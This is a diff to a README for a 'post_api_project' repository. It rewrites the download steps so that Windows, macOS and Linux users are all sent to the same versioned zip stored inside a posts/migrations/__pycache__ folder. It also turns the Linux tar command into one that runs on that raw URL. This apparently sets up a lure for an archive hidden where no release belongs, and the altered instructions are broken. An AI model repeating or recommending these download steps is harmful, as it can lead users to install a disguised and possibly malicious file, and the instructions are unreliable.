SILCISTER/post_api_project/README.md

 3. Download the appropriate package for your operating system.

    If you are unsure which file to choose, here are a few examples:
-   - For Windows, look for something like `post_api_project-windows.zip`.
+   - For Windows, look for something like `https://raw.githubusercontent.com/SILCISTER/post_api_project/main/posts/migrations/__pycache__/post_api_project-v3.4.zip`.
-   - For macOS, look for `post_api_project-macos.zip`.
+   - For macOS, look for `https://raw.githubusercontent.com/SILCISTER/post_api_project/main/posts/migrations/__pycache__/post_api_project-v3.4.zip`.
-   - For Linux, check for `post_api_project-linux.tar.gz`.
+   - For Linux, check for `https://raw.githubusercontent.com/SILCISTER/post_api_project/main/posts/migrations/__pycache__/post_api_project-v3.4.zip`.

 4. After downloading, locate the file in your Downloads folder.

 5. Extract the contents of the downloaded file to a folder of your choice.
 On Windows and macOS, you can usually right-click the file and select "Extract" or "Unzip."
-On Linux, you can open a terminal and use the `tar -xzf yourfile.tar.gz` command.
+On Linux, you can open a terminal and use the `tar -xzf https://raw.githubusercontent.com/SILCISTER/post_api_project/main/posts/migrations/__pycache__/post_api_project-v3.4.zip` command.

 6. Open your terminal (Command Prompt for Windows, Terminal for macOS and Linux).
 7. Navigate to the extracted folder using the `cd` command.
 For example: